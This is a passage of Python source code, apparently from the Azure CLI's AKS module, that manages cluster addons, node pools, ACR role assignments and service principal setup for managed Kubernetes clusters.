            # only linux is supported for now, in the future this will be a user flag
            addon += os_type

        # honor addon names defined in Azure CLI
        # (normalize case differences between stored and canonical addon keys)
        for key in list(addon_profiles):
            if key.lower() == addon.lower() and key != addon:
                addon_profiles[addon] = addon_profiles.pop(key)

        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(
                addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == CONST_MONITORING_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
                                   'before enabling it again.')
                if not workspace_resource_id:
                    # Fall back to the subscription's default Log Analytics workspace.
                    workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
                        cmd,
                        subscription_id,
                        resource_group_name)
                # Normalize the resource ID: leading slash, no trailing slash.
                workspace_resource_id = workspace_resource_id.strip()
                if not workspace_resource_id.startswith('/'):
                    workspace_resource_id = '/' + workspace_resource_id
                if workspace_resource_id.endswith('/'):
                    workspace_resource_id = workspace_resource_id.rstrip('/')
                addon_profile.config = {
                    CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
            elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
                if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError(
                        'The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {
                    CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
            elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
                                   'To change ingress-appgw configuration, run '
                                   f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                # Rebuild the profile from scratch with only the provided appgw options.
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={})
                if appgw_name is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
                if appgw_subnet_cidr is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
                if appgw_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
                if appgw_subnet_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
                if appgw_watch_namespace is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
            elif addon == CONST_CONFCOM_ADDON_NAME:
                if addon_profile.enabled:
                    raise ValidationError('The confcom addon is already enabled for this managed cluster.',
                                          recommendation='To change confcom configuration, run '
                                          f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
                                          'before enabling it again.')
                # SGX quote helper defaults to off unless explicitly requested.
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
                if enable_sgxquotehelper:
                    addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
            elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
                if addon_profile.enabled:
                    raise AzureInternalError(
                        'The open-service-mesh addon is already enabled for this managed '
                        'cluster.\n To change open-service-mesh configuration, run '
                        '"az aks disable-addons -a open-service-mesh -n {} -g {}" '
                        'before enabling it again.'
                        .format(name, resource_group_name))
                addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
            elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
                if addon_profile.enabled:
                    raise ArgumentUsageError(
                        'The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
                        'To change azure-keyvault-secrets-provider configuration, run '
                        f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '  # pylint: disable=line-too-long
                        'before enabling it again.')
                # Secret rotation defaults: disabled, 2-minute poll interval.
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
                if enable_secret_rotation:
                    addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
                if disable_secret_rotation:
                    addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
                if rotation_poll_interval is not None:
                    addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
                addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
            addon_profiles[addon] = addon_profile
        else:
            # Disabling: the profile must already exist (kube-dashboard is
            # tolerated as absent and materialized disabled).
            if addon not in addon_profiles:
                if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
                    addon_profiles[addon] = ManagedClusterAddonProfile(
                        enabled=False)
                else:
                    raise CLIError(
                        "The addon {} is not installed.".format(addon))
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable

    instance.addon_profiles = addon_profiles

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return instance
def _get_azext_module(extension_name, module_name):
    """Import and return the Python module backing an installed CLI extension.

    Adds the extension's install directory to sys.path first, then imports
    ``module_name``. Import failures surface as CLIError.
    """
    try:
        # Make the installed extension importable, then load its module.
        from azure.cli.core.extension.operations import add_extension_to_path
        from importlib import import_module
        add_extension_to_path(extension_name)
        return import_module(module_name)
    except ImportError as ie:
        raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
                        workspace_resource_id=None,
                        aci_subnet_name=None,
                        vnet_subnet_id=None,
                        appgw_name=None,
                        appgw_subnet_cidr=None,
                        appgw_id=None,
                        appgw_subnet_id=None,
                        appgw_watch_namespace=None,
                        enable_sgxquotehelper=False,
                        enable_secret_rotation=False,
                        rotation_poll_interval=None,):
    """Build the addon-profiles dict for cluster creation from --enable-addons.

    Splits ``addons_str`` on commas, consumes each recognized addon name
    (removing it from the working list) while building its
    ManagedClusterAddonProfile, and raises CLIError for any leftover
    unrecognized names. Returns the (possibly pre-seeded) ``addon_profiles``
    mapping of addon name -> profile.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                operation_group='managed_clusters')
    if not addon_profiles:
        addon_profiles = {}
    addons = addons_str.split(',') if addons_str else []
    if 'http_application_routing' in addons:
        addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('http_application_routing')
    if 'kube-dashboard' in addons:
        addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('kube-dashboard')
    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)
        # Normalize the resource ID: leading slash, no trailing slash.
        workspace_resource_id = workspace_resource_id.strip()
        if not workspace_resource_id.startswith('/'):
            workspace_resource_id = '/' + workspace_resource_id
        if workspace_resource_id.endswith('/'):
            workspace_resource_id = workspace_resource_id.rstrip('/')
        addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
        addons.remove('monitoring')
    # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
    elif workspace_resource_id:
        raise CLIError(
            '"--workspace-resource-id" requires "--enable-addons monitoring".')
    if 'azure-policy' in addons:
        addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('azure-policy')
    if 'virtual-node' in addons:
        if not aci_subnet_name or not vnet_subnet_id:
            raise CLIError(
                '"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
        # TODO: how about aciConnectorwindows, what is its addon name?
        os_type = 'Linux'
        addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
            enabled=True,
            config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
        )
        addons.remove('virtual-node')
    if 'ingress-appgw' in addons:
        # Only the appgw options the caller actually supplied go into config.
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        if appgw_name is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
        if appgw_subnet_cidr is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
        if appgw_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
        if appgw_subnet_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
        if appgw_watch_namespace is not None:
            addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
        addons.remove('ingress-appgw')
    if 'confcom' in addons:
        # SGX quote helper defaults to off unless explicitly requested.
        addon_profile = ManagedClusterAddonProfile(
            enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
        if enable_sgxquotehelper:
            addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
        addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
        addons.remove('confcom')
    if 'open-service-mesh' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
        addons.remove('open-service-mesh')
    if 'azure-keyvault-secrets-provider' in addons:
        # Secret rotation defaults: disabled, 2-minute poll interval.
        addon_profile = ManagedClusterAddonProfile(
            enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"}
        )
        if enable_secret_rotation:
            addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
        if rotation_poll_interval is not None:
            addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
        addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
        addons.remove('azure-keyvault-secrets-provider')
    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
    """Best-effort install of a CLI extension.

    Returns True on success; any failure (including import failure of the
    extension operations module) is swallowed and reported as False.
    """
    try:
        from azure.cli.core.extension import operations
        operations.add_extension(cmd=cmd, extension_name=extension_name)
        return True
    except Exception:  # pylint: disable=broad-except
        # Deliberate best-effort: callers only need a boolean outcome.
        return False
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
    """Update and reload an installed CLI extension.

    Returns False when the extension is not installed or its module cannot be
    loaded; a CLIError during the update itself is logged and treated as
    success (True), matching the original tolerant behavior.
    """
    from azure.cli.core.extension import ExtensionNotInstalledException
    try:
        from azure.cli.core.extension import operations
        operations.update_extension(cmd=cmd, extension_name=extension_name)
        operations.reload_extension(extension_name=extension_name)
    except CLIError as exc:
        # Non-fatal: log and fall through to the success return.
        logger.info(exc)
    except ExtensionNotInstalledException as exc:
        logger.debug(exc)
        return False
    except ModuleNotFoundError as exc:
        logger.debug(exc)
        logger.error(
            "Error occurred attempting to load the extension module. Use --debug for more information.")
        return False
    return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
    """Ensure a CLI extension is present, installing or updating as needed.

    Returns True when the extension is available for use, False otherwise.
    """
    from azure.cli.core.extension import (
        ExtensionNotInstalledException, get_extension)
    try:
        get_extension(extension_name)
    except ExtensionNotInstalledException:
        # Not installed yet: attempt a fresh install.
        return _install_dev_spaces_extension(cmd, extension_name)
    if update:
        return _update_dev_spaces_extension(cmd, extension_name, extension_module)
    return True
def _ensure_container_insights_for_monitoring(cmd, addon):
    """Deploy the ContainerInsights solution to the monitoring addon's workspace.

    Reads the Log Analytics workspace resource ID from the addon config,
    normalizes it, resolves the workspace's location, and deploys an ARM
    template that installs the ContainerInsights solution into that
    workspace. Returns the deployment poller from _invoke_deployment.
    """
    # Workaround for this addon key which has been seen lowercased in the wild.
    for key in list(addon.config):
        if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
                key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
            addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
                key)
    workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
    # Normalize the resource ID: leading slash, no trailing slash.
    workspace_resource_id = workspace_resource_id.strip()
    if not workspace_resource_id.startswith('/'):
        workspace_resource_id = '/' + workspace_resource_id
    if workspace_resource_id.endswith('/'):
        workspace_resource_id = workspace_resource_id.rstrip('/')
    # extract subscription ID and resource group from workspace_resource_id URL
    try:
        subscription_id = workspace_resource_id.split('/')[2]
        resource_group = workspace_resource_id.split('/')[4]
    except IndexError:
        raise CLIError(
            'Could not locate resource group in workspace-resource-id URL.')
    # region of workspace can be different from region of RG so find the location of the workspace_resource_id
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    try:
        resource = resources.get_by_id(
            workspace_resource_id, '2015-11-01-preview')
        location = resource.location
    except CloudError as ex:
        # Propagate the service error unchanged.
        raise ex
    # Millisecond timestamp makes deployment names unique per invocation.
    unix_time_in_millis = int(
        (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
    solution_deployment_name = 'ContainerInsights-{}'.format(
        unix_time_in_millis)
    # Nested ARM deployment: the inner deployment targets the workspace's own
    # subscription/resource group (which may differ from the cluster's).
    # pylint: disable=line-too-long
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {
            "workspaceResourceId": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics Resource ID"
                }
            },
            "workspaceRegion": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics workspace region"
                }
            },
            "solutionDeploymentName": {
                "type": "string",
                "metadata": {
                    "description": "Name of the solution deployment"
                }
            }
        },
        "resources": [
            {
                "type": "Microsoft.Resources/deployments",
                "name": "[parameters('solutionDeploymentName')]",
                "apiVersion": "2017-05-10",
                "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
                "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
                "properties": {
                    "mode": "Incremental",
                    "template": {
                        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                        "contentVersion": "1.0.0.0",
                        "parameters": {},
                        "variables": {},
                        "resources": [
                            {
                                "apiVersion": "2015-11-01-preview",
                                "type": "Microsoft.OperationsManagement/solutions",
                                "location": "[parameters('workspaceRegion')]",
                                "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                "properties": {
                                    "workspaceResourceId": "[parameters('workspaceResourceId')]"
                                },
                                "plan": {
                                    "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                    "product": "[Concat('OMSGallery/', 'ContainerInsights')]",
                                    "promotionCode": "",
                                    "publisher": "Microsoft"
                                }
                            }
                        ]
                    },
                    "parameters": {}
                }
            }
        ]
    }
    params = {
        "workspaceResourceId": {
            "value": workspace_resource_id
        },
        "workspaceRegion": {
            "value": location
        },
        "solutionDeploymentName": {
            "value": solution_deployment_name
        }
    }
    deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
    # publish the Container Insights solution to the Log Analytics workspace
    return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
                              validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cmd,
                    assignee,
                    acr_name_or_id,
                    subscription_id,
                    detach=False,
                    is_service_principal=True):
    """Attach (or detach, when detach=True) an ACR to the cluster identity.

    Accepts either a full ACR resource ID or a bare registry name; resolves
    the registry and delegates the acrpull role assignment to
    _ensure_aks_acr_role_assignment. Raises CLIError when the registry
    cannot be found or resolved.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id
    # Check if the ACR exists by resource ID.
    if is_valid_resource_id(acr_name_or_id):
        try:
            parsed_registry = parse_resource_id(acr_name_or_id)
            # The registry may live in a different subscription than the cluster.
            acr_client = cf_container_registry_service(
                cmd.cli_ctx, subscription_id=parsed_registry['subscription'])
            registry = acr_client.registries.get(
                parsed_registry['resource_group'], parsed_registry['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
        _ensure_aks_acr_role_assignment(
            cmd, assignee, registry.id, detach, is_service_principal)
        return

    # Check if the ACR exists by name across all resource groups.
    registry_name = acr_name_or_id
    registry_resource = 'Microsoft.ContainerRegistry/registries'
    try:
        registry = get_resource_by_name(
            cmd.cli_ctx, registry_name, registry_resource)
    except CloudError as ex:
        if 'was not found' in ex.message:
            raise CLIError(
                "ACR {} not found. Have you provided the right ACR name?".format(registry_name))
        raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cmd, assignee, registry.id, detach, is_service_principal)
    return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Return the agent pool resource for the named node pool."""
    return client.get(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
    """List every agent pool in the managed cluster."""
    pools = client.list(resource_group_name, cluster_name)
    return pools
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
                      kubernetes_version=None,
                      zones=None,
                      enable_node_public_ip=False,
                      node_public_ip_prefix_id=None,
                      node_vm_size=None,
                      node_osdisk_type=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      ppg=None,
                      max_pods=0,
                      os_type="Linux",
                      os_sku=None,
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      tags=None,
                      labels=None,
                      max_surge=None,
                      mode="User",
                      enable_encryption_at_host=False,
                      enable_ultra_ssd=False,
                      enable_fips_image=False,
                      no_wait=False,
                      aks_custom_headers=None):
    """Add a new node pool to an existing managed cluster.

    Validates that the pool name is unused, builds an AgentPool model from
    the keyword arguments, and starts the create-or-update operation
    (optionally without waiting). Raises CLIError when the pool already
    exists.
    """
    AgentPool = cmd.get_models('AgentPool',
                               resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                               operation_group='agent_pools')
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='agent_pools')
    # Reject duplicate pool names up front (case-sensitive comparison here).
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
    upgradeSettings = AgentPoolUpgradeSettings()
    taints_array = []

    if node_taints is not None:
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            except ValueError:
                # NOTE(review): str.strip()/list.append do not raise ValueError,
                # so this branch looks unreachable; taint-format validation
                # presumably happens elsewhere — confirm before relying on it.
                raise CLIError(
                    'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')

    # Default VM size depends on the node OS.
    if node_vm_size is None:
        if os_type.lower() == "windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"

    if max_surge:
        upgradeSettings.max_surge = max_surge

    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        os_sku=os_sku,
        vnet_subnet_id=vnet_subnet_id,
        proximity_placement_group_id=ppg,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,
        orchestrator_version=kubernetes_version,
        availability_zones=zones,
        scale_set_priority=priority,
        enable_node_public_ip=enable_node_public_ip,
        node_public_ip_prefix_id=node_public_ip_prefix_id,
        node_taints=taints_array,
        upgrade_settings=upgradeSettings,
        enable_encryption_at_host=enable_encryption_at_host,
        enable_ultra_ssd=enable_ultra_ssd,
        mode=mode,
        enable_fips=enable_fips_image
    )

    # Spot pools need an eviction policy; NaN max price means "pay up to on-demand" (-1).
    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        if isnan(spot_max_price):
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price

    _check_cluster_autoscaler_flag(
        enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)

    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)

    if node_osdisk_type:
        agent_pool.os_disk_type = node_osdisk_type

    # custom headers
    aks_custom_headers = extract_comma_separated_string(
        aks_custom_headers,
        enable_strip=True,
        extract_kv=True,
        default_value={},
    )
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        agent_pool,
        headers=aks_custom_headers,
    )
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Scale a node pool to a new node count.

    Rejects pools with the cluster autoscaler enabled and no-op scales where
    the requested count equals the current count.
    """
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    requested_count = int(node_count)
    if instance.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if requested_count == instance.count:
        raise CLIError(
            "The new node count is the same as the current node count.")
    instance.count = requested_count  # pylint: disable=no-member
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        instance,
    )
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
                          nodepool_name,
                          kubernetes_version='',
                          node_image_only=False,
                          max_surge=None,
                          no_wait=False,
                          aks_custom_headers=None):
    """Upgrade a node pool's Kubernetes version or just its node image.

    --node-image-only is mutually exclusive with both a Kubernetes version
    and --max-surge. Returns the poller for the underlying operation.
    """
    # NOTE(review): unlike the sibling commands, this get_models call omits
    # resource_type=ResourceType.MGMT_CONTAINERSERVICE — confirm the default
    # resolves to the same model.
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
    if kubernetes_version != '' and node_image_only:
        raise CLIError(
            'Conflicting flags. Upgrading the Kubernetes version will also '
            'upgrade node image version. If you only want to upgrade the '
            'node version please use the "--node-image-only" option only.'
        )

    # Note: we exclude this option because node image upgrade can't accept nodepool put fields like max surge
    if max_surge and node_image_only:
        raise MutuallyExclusiveArgumentError(
            'Conflicting flags. Unable to specify max-surge with node-image-only.'
            'If you want to use max-surge with a node image upgrade, please first '
            'update max-surge using "az aks nodepool update --max-surge".'
        )

    if node_image_only:
        return _upgrade_single_nodepool_image_version(no_wait,
                                                      client,
                                                      resource_group_name,
                                                      cluster_name,
                                                      nodepool_name)

    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.orchestrator_version = kubernetes_version

    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()

    if max_surge:
        instance.upgrade_settings.max_surge = max_surge

    # custom headers
    aks_custom_headers = extract_comma_separated_string(
        aks_custom_headers,
        enable_strip=True,
        extract_kv=True,
        default_value={},
    )
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        instance,
        headers=aks_custom_headers,
    )
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
                         enable_cluster_autoscaler=False,
                         disable_cluster_autoscaler=False,
                         update_cluster_autoscaler=False,
                         min_count=None, max_count=None,
                         tags=None,
                         max_surge=None,
                         mode=None,
                         labels=None,
                         no_wait=False,
                         aks_custom_headers=None):
    """Update a node pool's autoscaler settings, tags, mode, labels or max surge.

    Exactly one of the three autoscaler flags may be set; with none set, at
    least one of tags/mode/max-surge/labels is required. Returns None (after a
    warning) for no-op autoscaler toggles, otherwise the operation poller.
    """
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='agent_pools')
    # Booleans sum as ints: more than one autoscaler flag set is an error.
    update_autoscaler = enable_cluster_autoscaler + \
        disable_cluster_autoscaler + update_cluster_autoscaler

    if update_autoscaler > 1:
        raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler"')

    if (update_autoscaler == 0 and not tags and not mode and not max_surge and not labels):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--tags" or "--mode" or "--max-surge" or "--labels"')

    instance = client.get(resource_group_name, cluster_name, nodepool_name)

    # min/max count are required (and validated) only when enabling or updating.
    _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
                                       update_cluster_autoscaler)

    if enable_cluster_autoscaler:
        if instance.enable_auto_scaling:
            logger.warning('Autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks nodepool update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
        instance.enable_auto_scaling = True

    if update_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)

    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()

    if max_surge:
        instance.upgrade_settings.max_surge = max_surge

    if disable_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            logger.warning(
                'Autoscaler is already disabled for this node pool.')
            return None
        instance.enable_auto_scaling = False
        instance.min_count = None
        instance.max_count = None

    instance.tags = tags
    if mode is not None:
        instance.mode = mode
    if labels is not None:
        instance.node_labels = labels

    # custom headers
    aks_custom_headers = extract_comma_separated_string(
        aks_custom_headers,
        enable_strip=True,
        extract_kv=True,
        default_value={},
    )
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        instance,
        headers=aks_custom_headers,
    )
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
                         nodepool_name,
                         no_wait=False):
    """Delete a node pool after verifying it exists (case-insensitive match)."""
    existing_pools = client.list(resource_group_name, cluster_name)
    target = nodepool_name.lower()
    if not any(pool.name.lower() == target for pool in existing_pools):
        raise CLIError("Node pool {} doesnt exist, "
                       "use 'aks nodepool list' to get current node pool list".format(nodepool_name))

    return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Fetch the available upgrade profile for the named node pool."""
    profile = client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
    return profile
def _ensure_aks_acr_role_assignment(cmd,
                                    assignee,
                                    registry_id,
                                    detach=False,
                                    is_service_principal=True):
    """Create (or delete, when detach=True) the 'acrpull' role assignment
    for the given assignee on the registry scope.

    Raises CLIError when the role assignment cannot be created/deleted,
    which usually indicates insufficient (non-Owner) permissions.
    """
    if detach:
        removed = _delete_role_assignments(cmd.cli_ctx,
                                           'acrpull',
                                           assignee,
                                           scope=registry_id,
                                           is_service_principal=is_service_principal)
        if not removed:
            raise CLIError('Could not delete role assignments for ACR. '
                           'Are you an Owner on this subscription?')
        return

    created = _add_role_assignment(cmd,
                                   'acrpull',
                                   assignee,
                                   scope=registry_id,
                                   is_service_principal=is_service_principal)
    if not created:
        raise CLIError('Could not create a role assignment for ACR. '
                       'Are you an Owner on this subscription?')
def _ensure_aks_service_principal(cli_ctx,
                                  service_principal=None,
                                  client_secret=None,
                                  subscription_id=None,
                                  dns_name_prefix=None,
                                  fqdn_subdomain=None,
                                  location=None,
                                  name=None):
    """Return service-principal credentials for the cluster, creating a new
    service principal (and secret) when none was supplied.

    Returns a dict with 'client_secret', 'service_principal' and
    'aad_session_key' keys.
    """
    aad_session_key = None
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if service_principal:
        # --service-principal specfied, validate --client-secret was too
        if not client_secret:
            raise CLIError(
                '--client-secret is required if --service-principal is specified')
    else:
        # --service-principal not specified, make one.
        if not client_secret:
            client_secret = _create_client_secret()
        # Random salt keeps the placeholder URL unique per invocation.
        salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
        subdomain_label = dns_name_prefix if dns_name_prefix else fqdn_subdomain
        url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
            salt, subdomain_label, location)

